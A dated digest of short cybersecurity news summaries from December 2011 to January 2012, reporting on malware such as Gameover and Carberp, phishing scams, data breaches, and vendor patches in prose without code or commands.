Attackers targeting Windows Media bug with malware. Security researchers saw attackers going after the newly patched CVE-2012-0003 vulnerability in the Windows Media Player. The flaw, which was patched earlier in January by Microsoft, is a critical one that can enable remote code execution, and it affects a wide range of Windows systems. When the patch was released, Microsoft officials recommended customers install it immediately as there was a decent chance of attackers leveraging it in the near future, which is exactly what happened. Researchers at the IBM ISS X-Force saw malicious attacks against the MIDI vulnerability going on in the wild in recent days, and said because exploitation of the flaw is not considered difficult, there may well be more on the horizon. To exploit this vulnerability, an attacker must entice a user into opening a specifically formatted media file. Once the exploit code executes, the attacker would then have full control of the system. There are now pieces of malware circulating online capable of exploiting this vulnerability. The specific attack Trend Micro’s researcher’s analyzed uses the shellcode to download an encrypted binary, which it then decrypts and executes. The payload in this attack includes some malware with rootkit capabilities, which is installed on the victim’s machine. That rootkit also then connects to a remote server and downloads another component, a backdoor.

01/27/12

Symantec advises users to turn off pcAnywhere in hack aftermath. Symantec has advised customers to take their copies of pcAnywhere offline as the company continues to struggle with the aftermath of a major data breach. The company issued a whitepaper addressing new vulnerabilities in its remote access tool that were exploited by a recently publicized attack which allowed attackers to gain access to the application’s source code. The 2006 hack was recently brought to light by an Indian hacking team that is seeking to publicly distribute the code. Symantec has now determined a major update is necessary to protect users from any flaws revealed in the compromised source code. The company is advising users of pcAnywhere 12.5 to disable the remote management tool until an update is released. If users do not take their copies of the tool offline, the company warned attackers could possibly compromise systems and perform “man-in-the-middle” attacks that could result in the theft of user credentials and other network traffic.

Amateur programmer: SMS spoofing for malicious purposes is easy. SMS spoofing is not new, researchers having proved in 2010 for BBC’s Watchdog it could be done. While most telecommunications companies are aware of the risks, few have actually done something to prevent it. Now, an amateur programmer came forward with a simple app to prove SMS spoofing for malicious purposes is something widely available, and if measures are not taken, a lot of individuals may be exposed to cybercriminal operations. A self-described “completely amateur programmer” with less than 2 years’ experience, managed to develop a simple program that could allow anyone to launch social engineering attacks with the purpose of obtaining valuable information and maybe even money.

01/26/12

Super-powered ‘frankenmalware’ strains detected in the wild. Viruses are accidentally infecting worms on victims’ computers, creating super-powered strains of hybrid software nasties. The monster malware spreads quicker than before, screws up systems worse than ever, and exposes private data in a way not even envisioned by the original virus writers. A study by antivirus outfit BitDefender found 40,000 such “Frankenmalware samples” in a study of 10 million infected files in early January, or 0.4 percent of malware strains sampled. These cybercrime chimeras pose a greater risk to infected users than standard malware, the antivirus firm warns. “If you get one of these hybrids on your system, you could be facing financial troubles, computer problems, identity theft, and a wave of spam thrown in as a random bonus,” said the BitDefender analyst who carried out the study. “The advent of malware sandwiches throws a new twist into the world of malware. They spread more efficiently, and will become increasingly difficult to predict.” BitDefender does not have historical data to go on. Even so, it posits that frankenmalware is likely to grow at the same rate as regular computer viruses, or about 17 percent per year. All of the malware hybrids analyzed by BitDefender so far have been created accidentally. However, the risk posed by these combinations could increase dramatically as criminals latch onto the idea.

Fraud alert involving e-mail intrusions to facilitate wire transfers overseas. The FBI observed a trend in which cyber criminals are compromising the e-mail accounts of U.S. individuals and businesses and using variations of the legitimate e-mail addresses associated with the victim accounts to request and authorize overseas transactions, according to a January 20 alert. The wire transfers are being sent to bank accounts of individuals typically located domestically or in Australia, and the funds are being sent directly to Malaysia. Investigations found some of the money mules in the United States and Australia are victims of a romance scam and are asked to further transfer the funds to Malaysia. As of December 2011, the attempted fraud amounts were about $23 million; with actual victim losses about $6 million. This type of fraud has affected banks, broker/dealers, credit unions, and other institutions. In a typical scenario, the cyber criminal will send an e-mail to a financial institution, brokerage firm employee, or the victim’s financial adviser pretending to be the victim and request the balance of the victim’s account. When the request is successful, the cyber criminal then sends another e-mail providing a reason why they can only communicate via e-mail and asks that a wire transfer be initiated on their behalf. The excuse is typically based on an illness or death in the family that prevents the account holder from conducting business as usual.

Hackers prove EA, IGN, ImageShack, NY Times, and Verizon vulnerable. A new hacking collective, TeamHav0k, launched an operation called “#OP XSS” in which they try to find cross-site scripting (XSS) vulnerabilities in major Web sites. The first results of the operation came in and reveal many important sites contain XSS flaws. A Pastebin document reveals Web sites such as the ones belonging to Verizon, Huffington Post, European Organization for Nuclear Research, Electronic Arts (EA), IGN, and New York Times contain design flaws. Some educational institutions were also found to contain XSS security holes, including University of Illinois, Harvard, Yale, and Rockefeller University. Telecoms company Verizon, media hosting company ImageShack, value calculator and traffic estimator tool StatShow, Major League Gaming, and Dr. Pepper complete the list. Even though XSS vulnerabilities are among the most common ones found in commercial Web sites, this does not mean they are not dangerous. Cybercriminals can rely on these weaknesses to execute their own malicious codes and cause damage to the virtual assets of unsuspecting Internet users.

Researcher traces ‘Gameover’ malware to maker of Zeus. The “Gameover” malware that the FBI warned users about earlier in January 2012 is a preview of the next version of the even-more-notorious Zeus money-stealing trojan, a security researcher said January 23. “Gameover represents the latest and greatest source code package from the Zeus author,” a senior security researcher with Dell SecureWorks’ counter-threat unit said. “[New features] in Gameover will be rolled into the final Zeus version 3, which is in beta and will wrap up soon if it hasn’t already.” Two weeks ago, the FBI warned of increased action by Gameover, including rounds of spam that tried to dupe recipients into infecting their PCs with the malware, which like Zeus, is designed to pillage individuals’ and companies’ bank accounts. The security researcher, who has been tracking the Zeus malware and its developer for years, said Gameover posed a new and more dangerous threat because it had been created by the maker of Zeus specifically at the behest of one of his biggest clients. “The crew using Gameover has requested a lot of changes in the Zeus functionality,” he said, adding the hacker crew using Gameover has direct access to Zeus’ maker because it pays him well and often for support. “The Zeus author now has only three or four major clients,” he said. The criminal coder abandoned all his “small fish” to focus on supporting a handful of customers who pay top dollar for his work. The additions demanded by the Gameover gang, which the Zeus developer quickly created, included a new, more distributed form of command-and-control (C&C) that uses a peer-to-peer function to update infected machines when or if a botnet’s single C&C server is discovered by authorities and taken offline. Gameover also supports the use of complex Web injections that allow criminals to bypass multi-factor authentication now used by many financial institutions to stymie account plundering. And the crew apparently asked for changes to Zeus that would let the gang rent third-party botnets that specialize in conducting distributed denial-of-service (DDoS) attacks, the researcher added.

I spy your company’s boardroom. Researchers from Rapid7 discovered they could remotely infiltrate conference rooms in some of the top venture capital and law firms across the country, as well as pharmaceutical and oil companies and even the boardroom of Goldman Sachs — all by calling in to unsecured videoconferencing systems they found by doing a scan of the Internet. One of the researchers found he was able to listen in on meetings, remotely steer a camera around rooms, as well as zoom in on items to discern paint flecks on a wall or read proprietary information on documents. Despite the fact the most expensive systems offer encryption, password protection, and the ability to lock down the movement of cameras, the researchers found administrators were setting them up outside firewalls and failing to configure security features to keep out intruders. Some systems, for example, were set up to automatically accept inbound calls so users did not need to press an “accept” button when a caller dialed into a videoconference, opening the way for anyone to call in and eavesdrop. Using a program the researchers wrote, they found the conference rooms by scanning the Internet for videoconference systems set up outside firewalls and configured to automatically answer calls. In less than 2 hours, they found systems installed in 5,000 conference rooms, including an attorney-inmate meeting room at a prison, an operating room at a university medical center, and a venture capital company where prospects were pitching their companies while laying out their financial details on a screen in the room. Companies sometimes set up systems outside firewalls so other companies can easily call into the videoconferencing system without having to set up complex, but safer configurations. As a result, the researchers found they could easily hijack systems, and also access systems they otherwise could not find through an Internet scan.

01/23/12

Hoping to teach a lesson, researchers release exploits for critical infrastructure software. A group of researchers discovered serious security holes in six top industrial control systems used in critical infrastructure and manufacturing facilities and, thanks to exploit modules they released January 19, have also made it easy for hackers to attack the systems before they are patched or taken offline. The vulnerabilities were found in widely used programmable logic controllers (PLCs) made by General Electric, Rockwell Automation, Schneider Modicon, Koyo Electronics, and Schweitzer Engineering Laboratories. PLCs are used in industrial control systems to control functions in critical infrastructure such as water, power, and chemical plants; gas pipelines and nuclear facilities; as well as in manufacturing facilities such as food processing plants and automobile and aircraft assembly lines. The vulnerabilities, which vary among the products examined, include backdoors, lack of authentication and encryption, and weak password storage that would allow attackers to gain access to the systems. The security weaknesses also make it possible to send malicious commands to the devices to crash or halt them, and to interfere with specific critical processes controlled by them, such as the opening and closing of valves. As part of the project, the researchers worked with Rapid7 to release Metasploit exploit modules to attack some of the vulnerabilities. Metasploit is a tool used by computer security professionals to test if their networks contain specific vulnerabilities. Hackers also use the same exploit tool to find and gain access to vulnerable systems.

01/20/12

Bogus Western Union notice leads to phishing. A fake Western Union notice is hitting inboxes around the world and scaring people into following the offered link to a phishing page, Help Net Security reported January 18. “Failure in updating your profile will result in limiting your account access,” the spam e-mail says, signed by an “IT Assistant.” Users who fall for the trick are taken to a log-in page mimicking the Western Union one. Once they have entered the log-in credentials and pressed the “Sign In” button, they are asked to share information such as date of birth and answers to typical security questions such as their mother’s maiden name or favorite pet’s name. According to Hoax-Slayer: “Once they have this information, the scammers can then login to the victim’s real Western Union account and use it for nefarious purposes such as money laundering. The scammers may be able to use the stolen ‘Test Question’ details to collect payments without having the user’s proper identification documents.” Once the victims have done all that has been asked of them, they are redirected to the legitimate Western Union page.

Scanned documents from Xerox devices hide Blackhole exploit kits. The malicious technique where cybercriminals send e-mails pretending to come from a scanner inside an office building has been seen again, targeting e-mail accounts of company staff members. This time, an e-mail bearing the subject “Re: Scan from a Xerox W. Pro #XXXXXXX,” informs the recipient a document was sent to her from a Xerox device, Websense informs. Confused users, who may not know an employee named MAMIE that sent the e-mail, might rush to click on the link that allegedly points to five image files. Instead, once clicked, the link redirects the user to a Web site that hosts the malevolent Blackhole exploit kit. Hiding in an iframe, the kit looks for vulnerable software and once it finds it, executes a shellcode that triggers the execution and download of other pieces of malware. More than 3,000 of these messages have been discovered so far, but since this variant of the Blackhole kit is more advanced, allowing cybercriminals to tweak the malware, the number may increase. Blackhole is often rented by users and this latest version offers many improvements, such as administration options for smartphones, and an option for the kit to utilize underground audio and video scanners for malware.

McAfee to plug ‘spammer’ hole this week. McAfee plans to release a fix soon for a bug in its SaaS for Total Protection anti-malware service that scammers were using to distribute spam, the company said January 18. The problem came to light after McAfee customers reported in blog posts and forum sites that spammers were using a hole in McAfee’s RumorServer relay service to secretly send spam from their machines. The customers said they noticed the problem after their e-mails were blocked by e-mail providers, and their IP addresses appeared on blacklists. The problem is isolated to the SaaS Total Protection service, according to the director of security research at McAfee Labs. There is no evidence that any customer data has been lost or compromised as a result of the problem, he said. “The patch will be released on January 18 or 19, as soon as we have finished testing,” he wrote. “Because this is a managed product, all affected customers will automatically receive the patch when it is released. There are two issues with the software. One vulnerability could allow an attacker to misuse an ActiveX control to execute code on the victim’s computer. The second one, which is the issue the customers complained about, allows an attacker to misuse the “open relay” technology in the software.

01/19/12

New stealthy botnet Trojan holds Facebook users hostage. A new strain of cybercrime trojan is targeting Facebook users by taking over their machines and shaking them down for cash, The Register reported January 18. Carberp, like its predecessors Zeus and SpyEye, infects machines by tricking users into opening PDFs and Excel documents loaded with malicious code, or attacks computers in drive-by downloads. The hidden malware is designed to steal account information and harvest credentials for e-mail and social-networking sites. A new configuration of the Carberp trojan targets Facebook users to ultimately steal e-cash vouchers. Previous malware attacks on Facebook have been designed purely to steal log-in info, so this latest trojan, spotted by security firm Trusteer, can be considered an escalation. The Carberp variant replaces any Facebook page the user navigates to with a fake page notifying the victim their Facebook account is temporarily locked. The page asks the mark for their first name, last name, e-mail, date of birth, password, and a Ukash 20 euro ($25) voucher number to verify their identity and unlock the account. The use of anti-debugging and rootkit techniques make Carberp trojan difficult to detect, warns security consultancy Context Information Security. Context said: “Carberp is also part of a botnet that can take full control over infected hosts, while its complicated infection mechanisms and extensive functionality make it a prime candidate for more targeted attacks.” Context adds Carberp, which creates a backdoor on infected machines, can be controlled from a central administrator control panel, allowing botnet herders to more easily mine stolen data. Trusteer said it has reported the attack to Facebook.

Facebook ‘free mobile recharge’ scam hijacks accounts. A phishing and survey scam rolled into one is currently targeting Facebook users and ends up hijacking their accounts and makes it difficult for users to get them back, warns a McAfee researcher. The victims are lured with messages seemingly posted by friends claiming they received a “100rs free recharge.” Following the offered link, users connect to a page asking them to enter Facebook log-in credentials to receive it. Once the account details are entered and the “Log In” button is pressed, the page redirects users to a page mimicking a Facebook one, which asks the user to complete a survey to unlock the recharge option. In the background, the page sends the recorded log-in credentials — in clear text via a HTTP POST request — to a remote server operated by the scammers. The scammers then use the credentials to access the victims’ Facebook accounts, change information contained in them (including the password and the e-mail address), and post the same message that lured in the victims in the first place. The affected users are unable to immediately do anything about it. “Even if the victims try to reset their passwords, they will never get the password reset email from Facebook,” said the researcher.

McAfee software lets scammers hijack PCs to send spam. McAfee is looking into a problem with a service in its SaaS Endpoint Protection software that appears to be allowing computers to serve as open proxies for sending spam, the company told CNET January 17. “We are aware of the issue and have both threat analytics and development teams diligently analyzing the problem and possible solutions,” the company said in a statement. “We will have more information on the issue shortly. “The problem was reported by McAfee customers on the Web who complained their e-mails were being blocked by e-mail providers and their IP addresses were being blacklisted for sending spam. The problem appears to be in the RumorServer Service myAgtSvc.exe, McAfee Peer Distribution Service, which is part of McAfee SaaS Endpoint Protection Suite, previously known as Total Protection Service, according to the Kaamar Blog. The technology, used for delivering updates to computers without a direct Internet connection, serves as an Open Proxy on

01/18/12

Linux developers fix a homemade network problem. Linux kernels 3.0.17, 3.1.9, and 3.2.1 fix a problem with the handling of IGMP packets that was introduced with updates in Linux 2.6.36. An IGMPv3 protocol packet being processed soon after the processing of an IGMPv2 packet could lead to a system crash caused by a kernel panic. On January 6, a researcher reported strange crashes of his Linux notebook in the Debian bug database. A Debian developer found the problem was caused by a division by 0 that can occur with IGMP packets that have a Maximum Response Time of 0. As a result, Linux systems running a kernel version from 2.6.36 or later, up until the patched versions, can be crashed remotely using certain IGMP packets if a program has registered to receive multicast packets from the network. Typical examples for such programs include the avahi mDNS server or media players, such as VLC, that support RTP. Active attacks should technically only be possible within local networks, because IGMP broadcasts are usually not routed beyond network boundaries. However, the Debian developer pointed out particular unicast packets may serve for attacks via the Internet unless they are blocked by a firewall. As a fix was released, distributors should soon offer updated kernel packages that no longer contain the vulnerability.

Facebook chat phishing attack impersonates Facebook security team. A new phishing attack spreading through Facebook chat modifies hijacked accounts to impersonate the social network’s security team. The attackers replace the profile picture of compromised accounts with the Facebook logo and change their names to a variation of “Facebook Security” written with special Unicode characters, said a Kaspersky Lab expert. Facebook claims changing the profile name can take up to 24 hours and is subject to confirmation. However, in the expert’s tests the change occurred almost instantly and required only the password. This was also confirmed by a victim whose profile name was modified within 5 minutes of their account being compromised, he said. After the victim’s profile name and picture get changed, the attackers send out a chat message to all of their contacts informing them their accounts will be suspended unless they re-confirm their information. The rogue messages appear to be signed by “The Facebook Team” and contain a link to a phishing page hosted on an external domain. The Web page mimics Facebook’s design and asks for name, e-mail, password, security question, country, birth date, and other information needed to hijack the account. However, the attack does not stop there. According to the expert, a second form asks users for their credit card details and billing address. This is unusual for Facebook phishing attacks, the majority of which target only social networking account information.

Popular live-blogging site says data files were breached. CoveritLive, a popular, Web-based live-blogging program used worldwide, said January 13 it discovered “certain proprietary data files” of its users “were accessed without authorization,” but “no financial account information has been compromised. We have not yet determined if, or to what extent, CoveritLive account information (i.e., user names, email addresses and/or passwords) was accessed,” Demand Media, which bought CoveritLive in 2011, said in an e-mail to its users. Those users include bloggers, journalists, and mainstream media organizations, including msnbc.com, FoxNews.com, ESPN, and the BBC. Many people use CoveritLive’s free services, but there are premium accounts. Live-blogged events hosted by CoveritLive draw more than 60 million people every month, the company says, 60 percent of whom are from outside the United States. CoveritLive said the files were breached “starting on or about” January 7, and an investigation is “ongoing.” In the meantime, as a “precautionary measure,” all users were asked to re-set their passwords January 14.

01/17/12

American Express fixes critical security vulnerability. American Express has fixed a security vulnerability on its Web site that allowed SQL injection and, therefore, direct access to its server’s database, H Security reported January 13. The company acted after a tip-off. A student discovered the pages of the American Express Web site did not adequately filter data passed to a search function, thereby allowing direct access to the server. He sent a message about this SQL injection problem to the Heise Security team, who were able to reproduce it; the information was then passed on to American Express. The company reacted quickly and fixed the vulnerability within a few days. It stated the vulnerability had not been used and no customer data had been compromised. Some experts doubt this statement, however, since SQL injection frequently allows access to all of an affected system’s data, and tables with names such as “Accounts” often show up in SQL statements. Of particular concern is the vulnerability was found not in some hidden corner but in the search function –- the first place someone would test for such problems.

01/12/12

Phishing emails from spoofed US-CERT addresses. The U.S. Computer Emergency Readiness Team (US-CERT) has issued a public warning about a phishing e-mail campaign using spoofed US-CERT e-mail addresses. "The subject of the phishing email is: 'Phishing incident report call number: PH000000XXXXXXX' containing an attachment titled 'US-CERT Operation Center Report XXXXXXX.zip', with the 'X' possibly indicting a random value or string," US-CERT explained on its site. "The zip attachment contains an executable file with the name 'US-CERT Operation CENTER Reports.eml.exe'. Reports indicate that SOC@US-CERT(dot)GOV is the primary email address being spoofed but other invalid email addresses are being used." According to the organization, the e-mail was sent to employees of many private sector organizations and of federal, state, and local governments during the last few days. The attached executable is a yet unspecified type of malware. US-CERT advises users not to download and run the attachment or even open the e-mail in question, but to delete it.

Security updates from Microsoft and Adobe. Microsoft and Adobe each released a series of security patches for their products January 10. Microsoft released seven bulletins to close eight security holes in its products. These include vulnerabilities — in Windows Media, Windows Packager, and Windows Object Manager — which the company rates as critical. The bugs could be exploited by attackers to inject and execute malicious code on a victim's system via a specially crafted file. However, Windows 7 is not affected by the problem in Windows Media. The company finally released an update for Internet Explorer to fix the vulnerability in the SSL3.0/TLS1.0 protocol that has been known about since September. The related attack, known as BEAST (Browser Exploit against SSL/TLS), allows attackers to, for example, decrypt cookies that are transmitted in encrypted form and use them for unauthorized Web page logins. Microsoft planned to publish this update in December but later delayed the release due to compatibility issues with third party products. Adobe published versions 10.1.2 and 9.5 of its Acrobat and Reader products for Windows and Mac OS X. The updates fix critical vulnerabilities that could be used by an attacker to cause the application to crash and potentially take control of an affected system. Versions 10.1.1 and 9.4.7 and earlier of Acrobat and Reader are affected; all users are advised to upgrade.

01/11/12

Spam emails link to QR codes. The Websense ThreatSeeker Network reported it has started spotting spam messages leading to URLs that use embedded QR codes, according to Help Net Security January 10. The discovery indicated a clear movement and evolution of traditional spammers towards targeting mobile technology. The spam e-mail messages look like traditional pharmaceutical spam e-mails and contain a link to the Web site 2tag.nl. This is a legitimate Web service that allows users to create QR codes for URLs. Once the 2tag.nl URL from the mail message is loaded in the browser, a QR code is displayed, along with the full URL the QR code resolves to on the right. When the QR code is read by a QR reader, it automatically loads the spam URL (or asks before loading, depending on which QR reader the user has installed).

01/10/12

FBI warns of malware phishing scam. The FBI issued a warning the week of January 2, on a new Internet blight called “Gameover,” which, once ensconced on a PC, can steal usernames and passwords and defeat common methods of user authentication employed by financial institutions. The FBI said it has seen an increase in the use of Gameover, which is an e-mail phishing scheme that invokes the names of prominent government financial institutions — the National Automated Clearing House Association (NACHA), the Federal Reserve Bank, or the Federal Deposit Insurance Corporation (FDIC). The FBI said Gameover is a newer variant of the Zeus malware, which was created several years ago and specifically targeted banking information. This is how the FBI described the scam: “Typically, you receive an unsolicited e-mail from NACHA, the Federal Reserve, or the FDIC telling you that there’s a problem with your bank account or a recent ACH transaction. The sender has included a link in the e-mail for you that will supposedly help you resolve whatever the issue is. Unfortunately, the link goes to a phony website, and once you’re there, you inadvertently download the Gameover malware, which promptly infects your computer and steals your banking information. After the perpetrators access your account, they conduct what’s called a distributed denial of service, or DDoS, attack using a botnet, which involves multiple computers flooding the financial institution’s server with traffic in an effort to deny legitimate users access to the site.” The FBI went on to say some of the funds stolen from bank accounts go towards the purchase of precious stones and expensive watches from high-end jewelry stores.

Adobe plans critical security updates for Reader, Acrobat next week. Adobe said January 6 it will issue critical fixes for its popular Reader and Acrobat products January 10. The company said it is planning to release updates for Adobe Reader and Acrobat versions X and earlier for the Windows and Macintosh platforms to fix a slew of critical security issues. They include the vulnerabilities CVE-2011-2462 and CVE-2011-4369, which were patched in Adobe products up through version 9 in December, the company said on its PSIRT blog. The January patch will be released January 10 as part of Adobe’s monthly patch cycle.

01/09/12

Symantec confirms source code leak in two enterprise security products. Symantec confirmed January 5 that source code used in two of its older enterprise security products was publicly exposed by hackers the week of January 2. In a statement, the company said the compromised code is between 4 and 5 years old and does not affect Symantec’s consumer-oriented Norton products as was previously speculated. “Our own network was not breached, but rather that of a third party entity,” the company said in the statement. “We are still gathering information on the details and are not in a position to provide specifics ... Presently, we have no indication that the code disclosure impacts the functionality or security of Symantec’s solutions,” the statement said. A Symantec spokesman identified the two affected products as Symantec Endpoint Protection 11.0 and Symantec Antivirus 10.2. Both are targeted at enterprise customers and are more than 5 years old, he said. Symantec is developing a remediation process for enterprise customers still using the affected products, he noted. An Indian hacking group calling itself Lords of Dharmaraja earlier claimed it accessed source code for Symantec’s Norton AV products.

Chrome 17 enters beta, improves speed and security. Version 17 of Chrome has been released into the WebKit-based browser’s Beta channel, H Security reported January 6. Its developers said the new Chrome beta, version 17.0.963.26, is focused on improving security. With this version, Chrome’s Safe Browsing technology has been extended to protect against malicious downloads by analyzing executable files, including Windows .exe and .msi files. If a user visits a Web site and is tricked into downloading, for example, a fake anti-virus product, Chrome will issue a warning if the file appears to be malicious and will advise the user to discard it. The Chrome team at Google also updated the browser’s Stable channel to version 16.0.912.75, closing three high risk security holes. These include a use-after-free in animation frames, a heap-buffer-overflow in the libxml software library, and a stack-buffer-overflow in glyph handling.

Sony website defacer pawned by second hacker. A defacer affiliated with Anonymous vandalized Sony’s online front door the week of January 2 over the company’s support of the Stop Online Piracy Act a hated anti-piracy law proposed in the U.S., The Register reported January 6. The Sony Picture’s Web site was defaced and unauthorized comments were posted on the company’s Facebook page. The digital graffiti was scribbled by a hacker who uses the Twitter handle s3rver_exe. Both acts of vandalism were rapidly purged, while the YouTube video illustrating the hack was quickly pulled. The latest security breach comes after Sony announced it was bolstering its electronic defenses following the PlayStation Network hack in 2011, which forced Sony to take down its gaming platform for weeks.

01/06/12

SpyEye malware borrows Zeus trick to mask fraud. A powerful bank-fraud software program, SpyEye, has been seen with a feature designed to keep victims in the dark long after fraud has taken place, according to a January 4 report from security vendor Trusteer. SpyEye is notable for its ability to inject new fields into a Web page, a technique called HTML injection, which can ask banking customers for sensitive information they normally would not be asked. The requested data can include logins and passwords or a debit card number. It can also use HTML injection to hide fraudulent transfers of money out of an account by displaying an inaccurate bank balance. Trusteer found SpyEye also hides fraudulent transactions even after a person has logged out and logged back into their account. SpyEye does this by checking its records to see what fraudulent transactions were made with the account, then deleting them from the Web page, said Trusteer’s chief executive officer (CEO). The account balance is also altered. It appears SpyEye has borrowed from Zeus, a famous piece of banking malware now commonly available and considered its parent. Trusteer has seen the technique used when a fraudster uses SpyEye to capture debit card details. When that data is obtained, the fraudster conducts a purchase over the Web or phone, and SpyEye masks the transaction, the CEO said. It does not affect, however, the bank’s ability to see the fraud, he said.

Sites knocked offline by OpenDNS freeze on Google. Innocent Web sites were blocked and labelled phishers January 4 following an apparent conflict between OpenDNS and Google’s Content Delivery Network (CDN). OpenDNS — a popular domain name lookup service — sparked the outage by blocking access to googleapis.com, Google’s collection of useful scripts and apps for Web developers. According to reports, a flood of errors hit pages that used Google-hosted jQuery and hundreds of thousands of sites fell over. Visitors to Web sites were confronted with a message saying: “Phishing site blocked. Phishing is a fraudulent attempt to get you to provide personal information under false pretenses.” Other visitors were greeted with a 404 error. Web design and hosting specialist Brit-Net told The Register the outage lasted nearly 3 hours. As sites and service providers struggled to get back online, they employed fallback scripts and re-routed traffic to CDN. The cause of the problem with OpenDNS seemed to be the googleapi.com security certificates, according to a Brit-Net researcher.

New AOL Instant Messenger raises privacy concerns, EFF reports. The Electronic Frontier Foundation (EFF) analyzed the preview version of the latest AOL Instant Messenger and concluded users should not install it due to serious privacy concerns. The first issue is conversation logs are stored by default and secondly, all private instant messages are scanned for URLs, which means all the chats are fetched to AOL’s servers in Virginia. AOL’s decisions to move some of their services to the cloud, where data is usually stored in a plain text form, raises serious concerns because cybercriminals and law enforcement agencies could access it if they have a warrant. The customers’ privacy is at stake because in both scenarios their private conversations may become exposed even without their knowledge. Regarding the fact conversations are fetched to their servers to be scanned for URLs raises concerns with the EFF because AOL gives no clear indication on how this process occurs in their terms of service or privacy policies. The foundation believes the company should not only give users initial notice with an opt-in check box, but also explain to them in clear and specific terms how information is handled. AOL promised to disable this functionality for conversations that are marked to be “off the record.” However, the “off the record” feature is available only for customers who utilize the latest version of the program.

01/05/12

Lilupophilupop SQL injection attack tops 1 million infected URLs. A SQL injection attack that has been ongoing for several weeks hit a threshold of more than 1 million infected URLs, Threatpost reported January 4. The attack was first identified and disclosed by researchers at the SANS Internet Storm Center i early December, and at the time there were only a few thousand infected pages. The attacks seemed to be targeting sites with backends running on IIS, ASP, or Microsoft SQL Server, and there were some indications the attackers were doing reconnaissance on the infected sites for some time before the actual attack. The attack, which included a script that redirected users to a URL at lilupophilupop(dot)com, was similar to other mass SQL injection attacks that surfaced in recent years. “Sources of the attack vary; it is automated and spreading fairly rapidly. The trail of the files ends up on “adobeflash page” or fake AV. Blocking access to the lilupophilupop site will prevent infection of clients should they hit an infected site and be redirected,” a SANS ISC researcher wrote in the initial analysis of the attack. The goal of the attack seems to be to drive victims to a site that is peddling fake AV or scareware. That is where the monetization portion of the scheme comes in, with the attackers trying to lure victims into paying a license fee for a fake AV program they not only do not need, but will also likely cause other problems on their machines.

Spyware pushed via Google ads. A Zscaler researcher recently spotted a suspicious looking ad for a free Flash Video player in his Google Reader. By clicking on the link he was taken to the download page of the player, which repeats many times over the offered player is free. However, at the bottom of the page a disclosure statement reveals the software is bundled with additional products that “may include advertisement.” This particular piece of adware/spyware appears to install a toolbar along with the player, opens many ports in the system, attempts to connect with remote servers, and requests a number of URLs. “The ad was found on the RSS feed of a security company specialized in cleaning up infected websites,” the researcher said. “This highlights the fact that even reading content from otherwise legitimate resources can inadvertently lead users to unwanted applications when sites include third-party elements (JavaScript driven ads in this case, but also IFRAMES, widgets, etc.) that they do not have control over.”

01/04/12

Microsoft releases security update for DoS issue in ASP.NET. Microsoft rushed to release an out-of-band security update to resolve a denial-of-service (DoS) issue that affected ASP.NET versions 1.1 and later on all supported variants of the .NET framework. A large number of Web platforms are affected by the hash collision problem, but the company was among the first to act on it. The MS11-100 security bulletin fixes a vulnerability that exists in the way ASP.NET hashes specially crafted requests. The hash collisions that occur when malicious data is inserted into hash tables could overwhelm a server’s CPU resulting in a DoS condition. Besides this, other weaknesses are resolved in the latest security update. A phishing attack could be launched by a hacker using a spoofing vulnerability that verifies return URLs during the form authentication process. By exploiting this flaw, an attacker can redirect a user to a malicious Web site set up to obtain private data. An authentication bypass vulnerability that exists in ASP.NET forms is more difficult to exploit, but if an attacker manages to register an account on the application and knows the name of the targeted account, he could utilize a special Web request to initiate any action, including code execution, using the targeted account. Finally, an authentication ticket caching weakness allows for a cybercriminal to execute arbitrary code due to the way cached content is handled by the framework when Forms Authentication is used with sliding expiry. Combined with some social engineering, an attacker could send potential victims, ones with elevated privileges, a specially crafted link. Microsoft is not aware of any attacks taking place in the wild using these vulnerabilities, but to prevent any unfortunate incidents, users are advised to install the update.

01/03/12

Your smartphone from Amazon has shipped malware-spreading spam. Softpedia reported December 30 a malware scam involving an e-mail allegedly sent by Amazon to confirm that an electronic device such as a smartphone has already been paid for with the recipient’s credit card. Users who click on the links contained in the message are taken to a Web site that serves a variant of Cridex, especially designed to steal personal and financial information from the computer it lands on, according to Hoax Slayer. Win32/Cridex is usually delivered via spammed malware such as variants of Exploit:JS/Blacole and is programmed to spread to removable drives. Besides banking credentials, it also targets local certificates and it is able to execute files. Once executed, the malicious element drops a copy of the worm as a randomly named file and modifies the registry to make sure it is executed each time the operating system boots. After the dropper is deleted, Cridex injects itself into every running process, even ones that are later created.

12/30/11

Beware of password-protected documents carrying malware. Symantec researchers have recently spotted malware masquerading as password-protected document files - Word documents, spreadsheets, PowerPoint presentations, and PDFs - being delivered as e-mail attachments, Help Net Security reported December 29. “Attackers are misusing the password feature to encrypt files, most likely to make it difficult for security products to detect them as malware,” said the researchers. “It also makes reverse-engineering the files difficult because they need to be decrypted before analysis can be performed.” As the contents of the files in question are encrypted, some antivirus solutions might not recognize them for what they are immediately but only after they are opened with the password.

12/29/11

WiFi protected setup PIN brute force vulnerability. The WiFi Protected Setup (WPS) PIN is susceptible to a brute force attack, the United States Computer Emergency Readiness Team (US-CERT) reported December 27 after being notified by a member of the public who uncovered the vulnerability. A design flaw that exists in the WPS specification for the PIN authentication significantly reduces the time required to brute force the entire PIN because it allows an attacker to know when the first half of the 8 digit PIN is correct. The lack of a proper lock out policy after a certain number of failed attempts to guess the PIN on some wireless routers makes this brute force attack that much more feasible. The vulnerability affects all major brands of routers.

12/28/2011

Report: Phishing attack targets Apple customers. A ―vast phishing attack‖ that attempts to capture the credit card information of Apple customers was launched December 25, according to a report from Mac security-software company Intego. In a posting on its Mac Security blog, Intego said that the attack was an attempt to fool Apple customers into clicking on a link under the guise of updating the billing information of their Apple accounts. Users who click on the link in the phony e-mail will be taken to a realistic looking sign-in page that asks for the user‘s Apple ID and password. The user is then taken to a page asking them update account profile information, including credit card information. Intego reported that the messages are being sent with the subject ―Apple update your Billing Information‖ from a spoofed email address of ―appleid@id.apple.com.‖

Hackers target global analysis company. The global intelligence company Stratfor was hacked and had user information including credit card numbers posted online, CNN reported December 26. Around 4000 credit card numbers were released. Some Stratfor customers reported fraudulent charges being made to their credit cards after the information was posted on Pastebin. It was unclear whether the breach and apparent release of credit card information was the work of the activist hacking group Anonymous. The initial posting on Pastebin credited the AntiSec group, but a later message claiming to represent Anonymous denied any affiliation with the attack.

12/27/2011

